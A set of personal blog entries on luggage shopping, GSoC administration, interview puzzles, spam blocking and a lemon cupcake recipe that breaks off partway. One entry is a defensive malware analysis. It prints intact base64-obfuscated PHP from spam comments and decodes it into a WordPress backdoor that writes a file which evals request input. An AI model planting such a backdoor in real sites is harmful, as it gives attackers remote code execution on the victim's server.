Entry tags:

Scooter luggage and travel cosplay.

Luggage with a built-in scooter is awesome. I've seen ride-on wheeled luggage for kids (and coveted it mightily), and this appears to be the adult-friendly equivalent. Sadly, does not meet a lot of my other criteria (I'd be shocked if they let me avoid gatechecking this) and it's $250 (But at least shipping is free...). I'm tempted just for the awesome factor.

Here's a small hard case that meets a lot more of my criteria. It clocks in at 35cmx39cmx23cm (that's 14"x15"x9" for those of us who have to fly in America) and comes in cheerful colours. I'm actually not sure which one I'd choose -- normally I shun the pinks but that dark one is pretty lovely and would fit nicely into some sort of business-travelling fashionista persona if I dressed the part with some business casuals. But maybe the green or red would be less likely to clash with my existing wardrobe.... Honestly, I'm approaching this project much like I do cosplay, and now that I think about it it's not really that different: I'm playing for an audience to believe me to be someone very specific. Nevermind that I'm still projecting a variant on me; it's all the same body language, fashion, and carefully chosen accessories that make it work.

Similarly, a bright orange gem that could probably work with the persona too. 36x44x20cm (14x17x8") for that one, and only two wheels tucked into the edges so probably a bit more packing space in the final tally.

But despite the obvious appeal for my in-progress traveler persona, I'm not seeing any useful way for me to get reviews of these that I can actually understand since they're shipping from Hong Kong, and I haven't quite decided if I really should be making a hundred dollar gamble just because the colours are fun. I wonder if it's possible to find something similar that's at least a little more local to me? I have learned the useful new search terms "rolling business case" but it's mostly been turning up uninspired blackness.

Incidentally, I *did* check the wirecutter and they do have a section on bags, just not the kind I'm looking for. Bags are one of those few things I'm exceptionally picky about (especially right now while mildly injured, but even when not I tend to have precise requirements) so it probably isn't that much of a loss. They're apparently looking for a freelance bag editor and I rather wish I were actually the right person for that job. Lot of work for little pay, but a chance to try lots of bags!

Entry tags:

Smaller travel bags

I currently own a 20" rolling carry-on bag that has met my airline & train travel needs for years (I switched to it a year or two before airlines started charging for checked bags), and it's perfect for a week-long conference where I'm coming back or going out with a lot of stuff, or when I'm visiting my parents for close to a month at Christmas, but it seems excessive when I'm going for a weekend trip or a job interview.

I'm considering getting a smaller suitcase for those shorter trips, so I'm working out my requirements. This thread covers more or less what I have in mind, but here's some personal preference/requirement notes:

1. Must have wheels. I used to do backpack+purse for shorter trips, but I've been finding that I often pinch a nerve during travel and I'm pretty sure carrying my camera/laptop on my back is a factor.

2. Can fit my laptop and possibly SLR camera + 2-3 days worth of clothes. Thankfully my clothes are pretty small. Camera may be optional: I'm trying a downgrade to a point and shoot for short trips.

3. Preferably I'd like something that can fit into the overhead bin on the smaller regional jets, since often my flight will have one hop with those. A search says that this means the bag will have to be around 18Lx14Wx7D. Sounds like you can fit larger, but I'd rather not have to argue it out with the gate staff / flight attendant every time. I am perfectly ok with being given a checked tag and then "obliviously" carrying my bag on the plane anyhow as long as it will fit, though.

4. Butnot arguing with the gate/flight staff every time I fly would be awesome. This may mean going with something more backpack-like so I can just put it on my back when I walk on the plane, but mostly it just reinforces "small" and "looks like it holds a laptop." Briefcases should work.

5. Should have an open clothing section as opposed to a bunch of filefolder divider things that will make it harder to pack.

6. Should open fully, at least for the clothing section. Pure preference on my part.

7. I'm not too picky about laptop sleeves, although something I can easily slip a laptop out of for the TSA or in case I do have to check the bag is good. I basically never use my laptop on the plane, I just don't want to skycheck it.

8. If at all possible, not black. Something like 90% of the suitcases I see are black and I don't want to be worrying about someone grabbing mine by mistake.

9. But (and i realize this may contradict the "not black" thing) something that looks more business traveller-y would be good. I have a *lot* of trouble with TSA reps assuming I'm young or an infrequent traveler which is especially frustrating when I go somewhere with J and they immediately assume he's an expert while I get the "oh, hon, you know our machines are perfectly safe?" talk-down-to-the-little-girl spiel. (My new response: "My sister is a physicist who works in health and safety; I'd like to opt out." which is factually true but irrelevant and calculated to throw them and possibly nearby travelers out of their default headspace without getting into an argument.)

I've been finding that
(a) A disturbing number of online sites don't give pictures of the inside of the bags.
(b) A disturbing number of online sites don't give dimensions or even pictures that could help me guess the dimensions
(c) Bags are expensive (duh)
(d) There is an entire market for "women's suitcases" which I find somewhat strange. Particularly given that the "women's briefcase-bags" seem pretty much identical to the non-women's ones.

I don't have any short trips scheduled, but I'm hoping to find some bag options I like and catch a sale (luggage goes on sale quite frequently, so it's a bit ridiculous to pay full price if I've got time to spare).

I would love to hear first hand testimonials from any of you who travel with a bag that might meet my needs, though. It was a recommendation from Linuxchix that drew me to my current bag which has done me pretty well although it's starting to show its age now.

Entry tags:

Falling down the rabbit hole: An analysis of some questionable blog spam

WARNING: This entry contains some actual malicious code. I've HTML-escaped it so that it isn't going to get executed by you viewing it, but it was clearly intended to attack Wordpress blogs, so if you're going to mess around with analyzing, do it in a browser that's not logged in to any Wordpress blog.

So I was clearing spam queues this morning, and came across a bunch of spam with this string in it:


eval(base64_decode(‘aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qTiVQYCUqL2V2YWwvKklmXCcsLSovKC8qPjZgSGUqL2Jhc2U2NF9kZWNvZGUvKkBNKTIqLygvKn46SDUqL1wnTHlwM1kyQTdjQ292YVdZdktuY2hibHNxTHlndktsNXpXeUZVY25CUktpOXBjM05sZEM4cVVFZzBPWHhBS2k4b0x5cDRZR3BXS1U0cUx5UmZVa1ZSVlVWVFZDOHFjaUI0S2k5Ykx5b29mbEZ4S2k4bll5Y3ZLakUvUUdWMFd5b3ZMaThcJy8qT3pNNTIwKi8uLyo5SissKi9cJ3FQU3dwS2k4bmVpY3ZLblZVUVRrektpOHVMeXBEZTBjNlFEUmNLaThuYkNjdktqaDBJRzhxTHk0dkttMTVUVDA4UkdBcUx5ZDZKeThxZUdkbk1YWTJNU292TGk4cVZuQkpaelFxTHlkNUp5OHFaWHhxZVVFcUx5NHZLaXgyS0NvdkoyXCcvKnlBdCYqLy4vKkA1RHcmXU4qL1wnd25MeXBHTFZGdlREUXFMMTB2S21KaGEwMHBLaTh2S2x3N2MyNHFMeWt2S2s1M1Mwa25YeW92THlwUFgyc3FMeWt2S2toQVlVczBWQ292WlhaaGJDOHFNazU4TWpBK0tpOG9MeXBWYzBodFdWMWxXaW92YzNSeWFYQnpiR0Z6YUdWekxcJy8qWWFiayovLi8qT35xcyovXCd5bzhTR2N6S2k4b0x5cFZRVXRoWmlvdkpGOVNSVkZWUlZOVUx5cFdMa3RVSUhzcUwxc3ZLa3N0TG1NcUx5ZGpKeThxU0c5b0tpOHVMeXBZVGp0SEtpOG5laWN2S2pzbU15Z3lNV1FtWFNvdkxpOHFPMUJQZFNvdkoyd25MeXBaV1ZBelwnLyp7WUp9MSovLi8qdisoLTtrKi9cJ2VuVXFMeTR2S2xWc2FWVXRLaThuZW5sc0p5OHFSbFJaWERRcUwxMHZLazQvVW1JK0syWXFMeThxU3l0TFF5b3ZLUzhxYkVCcUtpOHZLbUpZUENvdktTOHFPbG8yVlVVb1NrSTRLaTh2S2tKWFp6dEFTeW92T3k4cVJUc3JkaWRKS2k4PVwnLyooa0NwQFk+Ki8pLypgYmMqLy8qSHZeISovKS8qV21GKi8vKlBfV2VgYD57Ki87LyotfGxURTEqLz8+Jyk7ZmNsb3NlKCRmKTt9′));

Or this clearly related one (note that the top of the string is the same):


aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qcGshV1UqL2V2YWwvKnpDRnI4ejQqLygvKi1mJWYmZyovYmFzZTY0X2RlY29kZS8qY2hIIG0qLygvKnZXXnEqL1wnTHlvL05tcHlLaTlwWmk4cU9ENUpUM2NxTHlndktsdHZLU292YVhOelpYUXZLa2M2WTNRcUx5Z3ZLaUZQWERrcUx5UmZVa1ZSVlVWVFZDOHFjU3R5S1RGNklDb3ZXeThxV0RkblNDb3ZcJy8qd0VEJSovLi8qWnA2OnIqL1wnSjJNbkx5b2hSU0VxTHk0dktrZEVSU3RrS2k4bmVpY3ZLa2NyUUVZd09Db3ZMaThxUFU5RUxqQTZUaW92SjJ3bkx5cDhkRE14UkNvdkxpOHFLVFIwT2xoc2MyZ3FMeWQ2ZVd3bkx5cFRcJy8qQ01MRzEqLy4vKmlUeVUwflAqL1wnVFZBdFFTb3ZYUzhxSnpaUFR5MHFMeThxVFZOYlpDb3ZLUzhxWEU1TU1Tb3ZMeXB1SjFzcUx5a3ZLaVZ5Y0N4aEtpOWxkbUZzTHlwTkxseHBLaThvTHlwdFVtNDFJSGxTS2k5emRISnBcJy8qXXgyZCovLi8qIG5SKi9cJ2NITnNZWE5vWlhNdktrbytiRGhrS2k4b0x5bzFOa3hZVTB0Z1RTb3ZKRjlTUlZGVlJWTlVMeXBPWGt0YVF6d3FMMXN2S201TWNrWXpjeUFxTHlkakp5OHFiQ3RLY2lvdkxpOHFUUzFuXCcvKmhccGhpKi8uLypjVz4qL1wnS2k4bmVpY3ZLaUZGTmlvdkxpOHFVeWRLUVNvdkoyd25MeXB1S1ZWQUxpb3ZMaThxYkZoV1BEOW9aU292SjNvbkx5cFZJRk1xTHk0dktqRkFlME1zS2k4bmVTY3ZLajk4V3lvdkxpOHFcJy8qPE9rNXBmKi8uLyo0VlhFKi9cJ1VtODJVeW92SjJ3bkx5cFZURm9xTDEwdktpWjNOQ292THlvL0xXWjVLaThwTHlvL01URXFMeThxSjN4ZlFTb3ZLUzhxT2psSlRGSXFMeThxYjBNeFFTY3JKU292T3k4cWVWbzVUeW92XCcvKiAzXCcqLykvKlpsWyUqLy8qLVRPJUdiNiovKS8qUyw3bjRTLCovLypCQ1sqLzsvKkxacHM8blNaKi8/PicpO2ZjbG9zZSgkZik7fQ==

As you can tell from the first sample, it's base64 encoded... something. b64 is pretty commonly used by attackers to obfuscate their code, so in case the spammy username and comment that went with the code wasn't enough to tell me that something bad was intended, the b64 encoding itself would have been a clue. If I didn't have the pretty huge hint of the base64_decode line, I might have been able to figure it out from the format and the fact that I know that b64 uses = as a padding (visible at the end of the second string).

Being a curious sort of person, I decoded the first string. In my case, I just opened up Python, and did this:


>>> import base64
>>> base64.b64decode(badstring1)
"if($f=fopen('wp-content/cache/ifooag.php','w')){fputs($f,'<?php /*N%P`%*/eval/*If\\',-*/(/*>6`He*/base64_decode/*@M)2*/(/*~:H5*/\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'/*OzM520*/./*9J+,*/\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'/*yAt&*/./*@5Dw&]N*/\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'/*Yabk*/./*O~qs*/\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'/*{YJ}1*/./*v+(-;k*/\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'/*(kCp@Y>*/)/*`bc*//*Hv^!*/)/*WmF*//*P_We``>{*/;/*-|lTE1*/?>');fclose($f);}"

(Well, okay, I actually ran cgi.escape(base64.b64decode(badstring1)) to get the version you're seeing in this blog post since I wanted to make sure none of that was executed in your browser, but that's not relevant to the code analysis, just useful if you're talking about code on the internet)

So that still looks pretty obfuscated, and even more full of base64 (yo, I heard you like base64 so I put some base64 in your base64). But we've learned a new thing: the code is trying to open up a file in the wordpress cache called ifooag.php, under wp-content which is a directory wordpress needs to have write access to. I did a quick web search, and found a bunch of spam, so my bet is that they're opening a new file rather than modifying an existing one. And we can tell that they're trying to put some php into that file because of the <?php and ?> which are character sequences that tell the server to run some php code.

But that code? Still looks pretty much like gobbledegook.

If you know a bit about php, you'll know that it accepts c-style comments delineated by /* and */, so we can remove those from the php code to get something a bit easier to parse:


eval(base64_decode(\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'.\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'.\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'.\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'.\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'));

Feel like we're going in circles? Yup, that's another base64 encoded string. So let's take out the quotes and the concatenations to see what that is:


Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzLyo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAzenUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=

You might think we're getting close now, but here's what you get out of decoding that:


>>> base64.b64decode(badstring1a)
"/*wc`;p*/if/*w!n[*/(/*^s[!TrpQ*/isset/*PH49|@*/(/*x`jV)N*/$_REQUEST/*r x*/[/*(~Qq*/'c'/*1?@et[*/./*=,)*/'z'/*uTA93*/./*C{G:@4\\*/'l'/*8t o*/./*myM=<D`*/'z'/*xgg1v61*/./*VpIg4*/'y'/*e|jyA*/./*,v(*/'l'/*F-QoL4*/]/*bakM)*//*\\;sn*/)/*NwKI'_*//*O_k*/)/*H@aK4T*/eval/*2N|20>*/(/*UsHmY]eZ*/stripslashes/*<Hg3*/(/*UAKaf*/$_REQUEST/*V.KT {*/[/*K-.c*/'c'/*Hoh*/./*XN;G*/'z'/*;&3(21d&]*/./*;POu*/'l'/*YYP3zu*/./*UliU-*/'zyl'/*FTY\\4*/]/*N?Rb>+f*//*K+KC*/)/*l@j*//*bX<*/)/*:Z6UE(JB8*//*BWg;@K*/;/*E;+v'I*/"

Yup, definitely going in circles. But at least we know what to do: get rid of the comments again.

Incidentally, I'm just using a simple regular expression to do this: s/\/\*[^*]*\*\///g. That's not robust against all possible nestings or whatnot, but it's good enough for simple analysis. I actually execute it in vim as :%s/\/\*[^*]*\*\///gc and then check each piece as I'm removing it.

Here's what it looks like without the comments:


if(isset($_REQUEST['c'.'z'.'l'.'z'.'y'.'l']))eval(stripslashes($_REQUEST['c'.'z'.'l'.'zyl']));

So let's stick together those concatenated strings again:


if(isset($_REQUEST['czlzyl']))eval(stripslashes($_REQUEST['czlzyl']));

Okay, so now it's added some piece into some sort of wordpress file that is basically just waiting for some outside entity to provide code which will then be executed. That's actually pretty interesting: it's not fully executing the malicious payload now; it's waiting for an outside request. Is this to foil scanners that are wise to the type of things spammers add to blogs, or is this in preparation for a big attack that could be launched all at once once the machines are prepared?

It's going to go to be a request that starts like this http://EXAMPLE.COM/wp-content/cache/ifooag.php?czlzyl=

Unfortunately, I don't have access to the logs for the particular site I saw this on, so my analysis stops here and I can't tell you exactly what it was going to try to execute, but I think it's pretty safe to say that it wouldn't have been good. I can tell you that there is no such file on the server in question and, indeed, the code doesn't seem to have been executed since it got caught in the spam queue and discarded by me.

But if you've ever had a site compromised and wondered how it might have been done, now you know a whole lot more about the way it could have happened. All I can really suggest is that spam blocking is important (these comments were caught by akismet) and that if you can turn off javascript while you're moderating comments, that might be the safest possible thing to do even though it makes using wordpress a little more kludgy and annoying. Thankfully it doesn't render it unusable!

Meanwhile, want to try your own hand at analyzing code? I only went through the full decoding for the first of the two strings I gave at the top of this post, but I imagine the second one is very similar to the first, so I leave it as an exercise to the reader. Happy hacking!

Entry tags:

Remove 80% of your blog comment spam by blocking IPTelligent!

I maintain a couple of blogs outside of this one, and the most popular one I'm involved with gets a lot of spam. There seemed to be a particular uptick about a month back, and I went to look into it.

What I discovered is that quite a lot of our spam (around 80%) was coming from one company called IPTelligent LLC. There's no easy way for me to tell if they are a legit company who simply have the worst IT staff in the history of IT staffs and all of their machines are compromised, or if they are, in fact, evil jerks who are repeatedly attempting to pollute the internet with really terrible spam. Given a short websearch, it seems pretty likely that IPTelligent is intentionally evil. I suppose one could argue that the level of incompetence displayed by someone who not only runs that many compromised machines but also serves up malware consistently is a form of evil even if it wasn't intentional. Whatever.

Either way, they are responsible for a rather large percentage of the spam we were receiving, and not responsible for any legit visits that we could see.

Since this particular blog uses Wordpress, solving the problem was pretty simple. Wordpress has built in lists for blocking comments, but they simply send to the moderation queue, as does popular plugin Akismet. Since we were seeing hundreds of messages per day from IPTelligent, I needed something that banned them more completely so our moderators wouldn't even see the messages and have to scan through them. Thankfully, there are lots of plugins for this. I settled on one called wp-ban that seems to be working well for my needs.

Once that's installed, the settings are under Settings->Ban. At the top of my list, I now have

# IPTelligent owns these ips, and they seem to be a spam company
96.47.225.*
173.44.37.*
96.47.224.*

Which covers the majority of the IP that were hitting us with spam. A glance at a more specific list of IPTelligent IPs suggests that those lines are good enough right now, although it's possible that they'll buy more IP blocks eventually. (We also have a longer list of other ips that appear to be compromised and were causing problems, but they look more like temporary compromises than intentional, long-term malice so I'm not listing those IPs here).

Of course, it would be better if someone took the company to court for this. I am not a lawyer, but it seems to me that the Computer Fraud and Abuse Act must cover at least some portion of their activities. I mean, the things they charged Aaron Swartz with under that act seem less sketchy than what IPTelligent is doing. But court cases take time and money, and banning them right now is pretty easy, so I figured I'd share the short-term solution in case it's useful to anyone who'd like to get a little less spam right away. (We are indeed getting ~80% less spam since the bans went into place.)

For the record, here's the company info as I get from the whois database right now:

OrgName:        IPTelligent LLC
OrgId:          IPTEL-1
Address:        2115 NW 22nd Street
Address:        #C110
City:           Miami
StateProv:      FL
PostalCode:     33142
Country:        US
RegDate:        2009-03-31
Updated:        2012-07-16
Ref:            http://whois.arin.net/rest/org/IPTEL-1

ReferralServer: rwhois://rwhois.iptelligent.com:4321

OrgNOCHandle: NOC3572-ARIN
OrgNOCName:   Network Operations Center
OrgNOCPhone:  +1-888-638-5893
OrgNOCEmail:  sysop@iptelligent.com
OrgNOCRef:    http://whois.arin.net/rest/poc/NOC3572-ARIN

Entry tags:

Updates and links

First some me-related updates:

I got to help staff a table at roborave on Saturday. fun! I was too busy to take pictures, so don't ask.

GSoC ranking continues apace. It's actually less busy for me than it was, since I don't need to interact with the students as much until selection is finished, so I've gone from over a hundred people potentially wanting to talk to me to something closer to 20-30. (project admins + mentors with melange trouble). I expect there'll be some wrangling to make sure the Systers and Mailman don't have any overlapping project ideas, but that can wait a few days.

To save people from asking me: I'm not expecting to hear about the Portland job for another couple of weeks. This is actually pretty convenient for me since it means I can focus on GSoC during the selection period; horray for good timing!

And then some links that amused me:

Check out this awesome quote from the guy who introduced Sriracha sauce to the west.. Just scroll down; it's been helpfully put into the picture of Mr. David Tran. But the article itself is pretty interesting too.
You may have seen the link going around claiming that the Miss Korea contestants all look like clones. I chalked it up to some sort of racist "all Korean people look the same" nonsense, but this analysis of why they all look the same is pretty interesting. Short answer: makeup and photoshop by pageant folk. (Although I bet there's some racism involved in the spread of the link too.)
"Ship just got real." This is the most compelling smooth-jazz voiceover in a trailer for a turn-based boat game that you're going to see today. At least until you watch the second one, which has even more boat puns. J tells me that the game is actually pretty fun even though he only bought it because the trailer was hilarious.
Ever wanted to know if your interface is being messed with by a monkey? Android has you covered with isUserAMonkey().
Also, there exists a set of log.wtf functions in Android. Handy!

Entry tags:

Two interview questions I enjoyed

There's a longer, friends-locked post before this one talking about the interviews I had this week, but it occurs to me that the more general public might get a kick out of the two interview questions that most amused me:

My new favourite interview question:

Given this code...

if ( X ) 
  print("hello")
else 
  print("world")

What do you need to insert in place of X in order to get this code to print "helloworld" ?

And the second one:

If you're in a room with a light bulb that's on, how can you make it be off?

(This was asked shortly after they told me they were asking to see if I had the security mindset, which is a pretty huge clue as to the types of answers they were hoping to hear. I had a lot of fun with this.)

I am leaving my answers out of this post so that you can think about the possibilities yourselves, but of course feel free to discuss in the comments.

Finding the best thing (without reading all the reviews)

I know geeks are stereotypically supposed to love drooling over new technology and comparing specs and stuff, but that's never really been my scene. There are things I care about enough to do research on, things I have particular requirements for that I want to meet, and then there's everything else. I don't want to buy/download/use crap, and I don't want to read breathless review after breathless review.

So I was really excited to hear about The Wirecutter, which purports to just list off the best thing (with a few alternatives) in various classes of things.

It's interesting, too, that it's got stuff like the big wait sign on this page right now which tells you that new stuff is coming so if you're not desperate, you might as well wait 'till they've been able to review the new things. Makes me feel a lot more reassured about the freshness of their information.

Used it for the first time yesterday to replace my defective point-and-shoot camera (which is a longer story, but one I'm not telling today) and it was fantastic to spend so little time making a decision. We'll see how it works out long run, but it's already saved me hours of my life and I came away feeling pretty close to as informed as I do after reading All The Reviews. Win!

Entry tags:

gsoc

GSoC students: Doing the personal email thing right

So, after I threatened to make this my new form letter (FYI: I haven't, but I do cut and paste from it to make shorter, more personal answers) the first email I see from a student is, again, personally to me, but... he was totally doing it right. Posted to the mailing list, waited a bit for a response, checked to see who was talking about this idea last, saw it was me, then pinged me to ask if I'd seen the posts (which he linked to make it easier for me) and asked if I could help answer his questions.

I am so pleased. :)

And now, I'd best stop talking about how lovely the email is and get on to that part where I either answer him or deflect to a mentor who isn't quite so overwhelmed this weekend... Did I mention I'm going out of town tomorrow?

Entry tags:

gsoc

The GSoC email that may become my new form letter

In case anyone was worried, no, I haven't actually started sending out form letters, but I am using this as a template I can cut & paste from for shorter, more personal emails to students.

Dear prospective student,

I've been getting a *lot* of personal emails/irc queries/IM messages since I took over as the organizational administrator for the Python Software Foundation. It's pretty neat because I'm really thrilled to see so many people excited about Google Summer of Code, but mostly, you shouldn't be contacting me directly.

If you're interested in one of the Python projects:

Take a look at the list of organizations running projects under the PSF:
http://wiki.python.org/moin/SummerOfCode/2013

Each one has a mailing list and sometimes an IRC channel associated with it. That is where you should be introducing yourself and asking questions.

If you are not sure who to contact for any reason, you should be asking on the soc2013-general mailing list. You can subscribe to this here:
http://mail.python.org/mailman/listinfo/soc2013-general/

If you're emailing me with regard to Systers and not a project under the Python Software Foundation, the same things apply only the relevant list is systers-dev, available here:
http://systers.org/mailman/listinfo/systers-dev

Why shouldn't you email me?

1. If you email the lists, lots of mentors from around the world will see your question. If I'm asleep or at work, they'll probably be able to answer it faster than I can.
2. If you email the lists and the person answering you answers on the list, it can benefit all the people who might have a similar question.
3. Chances are, I'm not going to be the mentor for your project, so there is someone out there who can answer your question better than I can.

Thanks very much, and good luck in your GSoC applications!

Terri

Lemon Googe Cupcakes (or Lubricated Lemon Cupakes, if you prefer, but you probably don't)

This is crossposted from Curiousity.ca, my personal maker blog. If you want to link to this post, please use the original link since the formatting there is usually better.

I helpfully told my friend Adric that these cupcakes were my way of doing human testing without requiring IRB approval. Remember kiddies, experimental cupcakes are only one step away from mad science because my guinea pigs generally consent to the experiment!

Figure 1: Lemon Googe Cupcake without icing. Note the “clever” use of bad filter in attempt to disguise poor quality cell phone photo, as per cultural norms in a post-instagram world

Lemon Googe Cupcakes

These come in three parts; some assembly required. I made up the recipe as a whole based on my recollection and modification of recipes in my head / recipe card box, with some inspiration from the filled cupcakes in Vegan Cupcakes Take Over the World (although this is not a vegan recipe).

Lemon Cupcake

1/4 C (4 tbsp) butter

3/4 C sugar (1/2C is probably ok for this recipe if you want to cut back)

1 egg

1 tsp vanilla

Zest from one lemon

1/2 C milk

1 tsp baking powder

1 C flour

Cream butter and sugar together; add egg, vanilla, lemon zest and milk and stir well.

Add baking powder and flour and stir until smooth (but no longer).

Spoon into cupcake liners (or I use silicone molds), filling about halfway.

We made 16 cupcakes, you might want to fill a bit higher to get 12.

Bake at 350F for 20-25 minutes (10-15 min for mini cupcakes)

Lemon Googe Filling

The name comes via my Ottawa friends: for some reason we decided that “googe” best described the texture of those little gel cup sweets that are considered to be a choking hazard in the US. This nomenclature would probably have died out, but one of my friends was severely grossed out by the word, so we have used it to describe anything of a given gooey texture ever since.

You’ll note that this is more or less a lemon pie filling recipe, omitting the egg, or a slightly gooey lemon pudding.

1/4 C cornstarch

1/2 C cold water

1 C hot water (Or less if you want thicker googe)

Juice from one lemon

3/4 C icing sugar (or adjust this to taste)

~3 drops of yellow food colouring

Mix together cornstarch and cold water, then add mixture to hot water along with lemon juice and sugar and stir well. Heat in microwave repeatedly (around 30-45s per time), stirring after each heating, until mixture is thick and no taste of cornstarch remains. You can probably nuke it longer between stirrings, but if it boils once it’s thicker it might splatter all over your microwave, so keep an eye on it. Add food colouring, because normal lemon pie filling gets its colour from egg yolk and you want people to immediately think “lemon” and not “what the heck?” as they might have if you had allowed your lovely assistant to use the blue colouring like he wanted.

If you are making mini cupcakes or just don’t plan to lose as much to taste-testing for the sugar, you can probably halve the googe recipe. Or you can allow people to dip the cupcakes in the remaining googe like some sort of weird fondue; I don’t judge.

You can add sugar after the fact if you think it needs more — it’ll dissolve, and no one minds getting a blob of icing sugar. You can’t do this with the cornstarch, though.

Figure 2: A metric ton of lemon googe, prior to colouring. (Well, ok, it’s 400ml rounded up.) This may be an excessive amount of googe for a single batch of cupakes; see experimental notes below.

Cream Cheese Icing

4 oz regular cream cheese (half a package usually. Don’t use the spreadable stuff.)

1/4 C butter

1 tsp vanilla

Around 2 C icing sugar (or however much it takes until the consistency is correct)

I suspect you’re supposed to plan ahead for this and soften the butter and cream cheese in advance, but what I do is nuke those suckers together ’till they’re practically liquid and easy to stir (around 1 min), then add vanilla and sugar ’till it’s a slightly goopy icing consistency, and let it firm up as it cools. This strategy actually does make it easier to deal with the final icing in this case, since it’s easier to spread when a bit more liquid-y, but your mileage may vary.

You could probably put some lemon in here too, but at this point that seems like overkill.

Assembly instructions

Get an icing bag with a metal or plastic tip (sorry, this is one time that cutting the corner off a plastic bag probably isn’t enough). We’ll be using this to fill the cupcakes with lemon googe.

I chose a slightly too big tip, so my googe was spilling everywhere, and the lazy “I’m not sticking my hand in there to get a new tip because our kitchen sink broke this morning” solution was:

1. Stab the icing tip into the cupcake.

2. Spoon a tablespoon or so of googe into the bag.

3. Squeeze the googe into the cupcake, trying not to go right through to the bottom

Repeat, doing 1 more quickly subsequent times because you are dripping sticky slime all over the counter.

Yeay!

I had my lovely assistant do this part so it wasn’t bad for me at all, but you might want to save yourself the trouble and not use the largest icing tip you have on hand.

Figure 3: Lubricated lemon cupcakes. I’m pretty sure this monkier is not going to impress the friend who hates the word googe, but it’s more alliterative so it can be the alternate recipe name. Note the tools in the background include googe, an icing bag, and a place to put the icing bag so it doesn’t googe all over the counter.

You now have a cupcake with a gooey hole in it. I will refrain from juvenile jokes, but this may be the point where you’ll be really glad you used the food colouring so your lovely assistant will not think of juvenile jokes.

Cover your googe-filled cupcakes with cream cheese icing. This will be challenging because you’re basically holding a lubricated cupcake and the icing will slide off the hole in the center. Having experimented with this, I can tell you that it is easiest to ice the outside and then cover the googe last. It’s also fun to slime the top of the cupcake and layer the icing on that, which will add extra lemony goodness but is also really messy.

Figure 4: Lemon googe cupcakes, partially and fully prepared

The Lemon Googe Cupcake Experiments

Hypothesis: lemon googe, if inserted into the cupcake 24h+ in advance, will suffuse the cupcake making it more delicious.

Method:

16 cupcakes were created in the initial batch.

2 were assembled and eaten immediately and declared delicious by both experimental subjects J and T.

